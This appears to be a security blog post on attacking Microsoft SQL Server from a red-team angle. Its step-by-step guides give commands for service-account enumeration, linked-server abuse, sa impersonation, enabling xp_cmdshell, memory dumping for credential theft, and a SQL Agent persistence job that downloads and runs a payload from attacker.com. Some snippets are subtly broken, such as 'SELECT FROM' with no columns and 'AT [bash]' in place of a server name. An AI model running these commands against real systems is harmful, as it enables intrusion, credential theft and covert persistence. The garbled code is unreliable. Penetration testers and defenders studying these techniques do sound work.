Listen to this Post
Introduction:
In the labyrinth of internal corporate networks, Microsoft SQL Server instances are often the overlooked treasure trove for attackers. A single misconfiguration can serve as the initial foothold, leading to a cascade of privileges and ultimately, full domain compromise. This article delves into the advanced techniques and tools red teams use to exploit these database systems, transforming them from data repositories into powerful offensive launchpads.
Learning Objectives:
- Understand the common privilege escalation paths from a compromised MSSQL service account to Domain Administrator.
- Learn to utilize cutting-edge tools for automated MSSQL reconnaissance, enumeration, and exploitation.
- Master the commands for lateral movement and persistence through MSSQL server links and stored procedures.
You Should Know:
1. The Initial Foothold: Service Account Compromise
MSSQL servers often run under domain service accounts. Gaining access to these credentials is frequently the first step.
Command (PowerShell):
Get-WmiObject -Class Win32_Service -ComputerName TARGET_SQL_SERVER | Where-Object {$_.Name -like "sql"} | Select-Object Name, StartName, State
Step-by-Step Guide:
This WMI query remotely enumerates services on the target server, filtering for those with “sql” in the name. The `StartName` property reveals the account under which the service runs. If it’s a domain account (e.g., DOMAIN\sqlservice), you have a potential target for credential attacks or Kerberoasting.
2. Automated MSSQL Reconnaissance with SQLRecon
The post highlights a powerful tool for this purpose. SQLRecon automates the tedious process of enumerating links and configurations across multiple servers.
Command (CLI):
Install via go go install github.com/sanjivkawa/sqlrecon@latest Basic enumeration of a single instance sqlrecon -s TARGET_SQL_SERVER -i
Step-by-Step Guide:
After installing the Go tool, the `-s` flag specifies the target server. The `-i` flag performs initial reconnaissance, gathering information like version, linked servers, and user permissions. This provides a map of the database environment from a single point of entry.
3. Abusing Server Links for Lateral Movement
A critical finding in many internal assessments is configured linked servers, which allow queries to be executed on other SQL instances.
Command (MSSQL):
-- Enumerate existing linked servers
EXEC sp_linkedservers;
-- Execute a command on a linked server
SELECT FROM OPENQUERY("LINKED_SRV", 'SELECT @@version as version;');
-- Use xp_cmdshell on a linked server (if enabled)
EXECUTE('xp_cmdshell ''whoami''') AT [bash];
Step-by-Step Guide:
The `sp_linkedservers` stored procedure lists all configured links. `OPENQUERY` allows you to run a SELECT query on the linked server. If `xp_cmdshell` is enabled on the linked server, you can execute operating system commands by wrapping the call in an `EXECUTE…AT` statement, effectively moving laterally.
4. Privilege Escalation via Impersonation
MSSQL allows users to impersonate other logins if granted the necessary permission, a key privilege escalation vector.
Command (MSSQL):
-- Check for impersonation permissions SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; -- Impersonate the sa login EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER;
Step-by-Step Guide:
The first query identifies logins that have permission to impersonate others. Finding a user with permission to impersonate the powerful `sa` login is a major win. The `EXECUTE AS LOGIN` command then switches your security context to that user, granting you their elevated privileges.
5. Command Execution with xp_cmdshell
The ultimate goal is often to break out of the SQL context and execute commands on the underlying OS.
Command (MSSQL):
-- First, check if xp_cmdshell is enabled SELECT FROM sys.configurations WHERE name = 'xp_cmdshell'; -- If disabled (value = 0), enable it (requires admin privileges) EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- Execute a system command EXEC xp_cmdshell 'whoami';
Step-by-Step Guide:
This series of commands first checks the status of xp_cmdshell. If disabled, it enables the “show advanced options” setting, then enables `xp_cmdshell` itself. Once enabled, you can run any system command, effectively giving you a command prompt on the database server.
6. Stealing Credentials via Process Memory
SQL Server processes often have sensitive credentials in memory. Tools like SQLRecon can automate dumping these for offline parsing.
Command (CLI with SQLRecon):
Use SQLRecon to dump process memory via a linked server sqlrecon -s PRIMARY_SRV -l LINKED_SRV -r memory -o dump.txt
Step-by-Step Guide:
This advanced SQLRecon command (-r memory) targets a linked server (-l LINKED_SRV) from your initial compromise point (-s PRIMARY_SRV) and attempts to dump the SQL Server process memory to a file (-o dump.txt). This file can then be analyzed with a tool like Mimikatz to extract clear-text passwords or hashes.
7. Persistence via SQL Server Agent Jobs
To maintain access, attackers can schedule tasks to run regularly using the SQL Server Agent.
Command (MSSQL):
-- Create a new job that runs a system command USE msdb; EXEC dbo.sp_add_job @job_name = 'SystemMaintenance'; EXEC sp_add_jobstep @job_name = 'SystemMaintenance', @step_name = 'RunSync', @subsystem = 'CMDEXEC', @command = 'cmd /c "curl http://attacker.com/payload.exe -o C:\temp\payload.exe && C:\temp\payload.exe"'; EXEC sp_add_jobschedule @job_name = 'SystemMaintenance', @name = 'Nightly', @freq_type = 4, @freq_interval = 1, @active_start_time = 010000; EXEC sp_add_jobserver @job_name = 'SystemMaintenance';
Step-by-Step Guide:
This creates a job named “SystemMaintenance” that uses the `CMDEXEC` subsystem to download and execute a payload. The job is scheduled (sp_add_jobschedule) to run every day (@freq_interval = 1) at 1 AM (@active_start_time = 010000). This provides reliable, scheduled persistence that blends in with normal administrative tasks.
What Undercode Say:
- The Path to DA is Paved with SQL Links: A single vulnerable MSSQL server is rarely the end goal. Its true value lies in its connections—linked servers, service accounts, and trusted relationships—that can be weaponized to hop across the network until domain administrator privileges are achieved.
- Automation is Key to Depth: Manual enumeration of complex SQL environments is impractical. The shift towards tools like SQLRecon represents the modern offensive mindset: automated, comprehensive, and designed to quickly map and exploit trust relationships across entire estates, including cloud-integrated systems like Entra ID.
The professional consensus is clear: MSSQL is a critical attack surface that is chronically under-secured. Its deep integration with Windows authentication and common misconfigurations around linked servers and command execution make it a prime target. The maturity of offensive tooling has drastically reduced the time from initial compromise to domain escalation, turning database administrators into first-line defenders.
Prediction:
The convergence of hybrid cloud environments (like Entra ID/Azure SQL integration) will expand the attack surface, making SQL-based enumeration tools indispensable for both red and blue teams. We predict a rise in fileless attacks that abuse legitimate SQL procedures for entire attack chains, from recon to data exfiltration, making detection by traditional security tools more difficult. Defense will require a paradigm shift towards stricter adherence to the principle of least privilege for service accounts, pervasive monitoring of SQL server link traffic, and behavioral analysis of stored procedure execution.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Vamsi Krishna – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
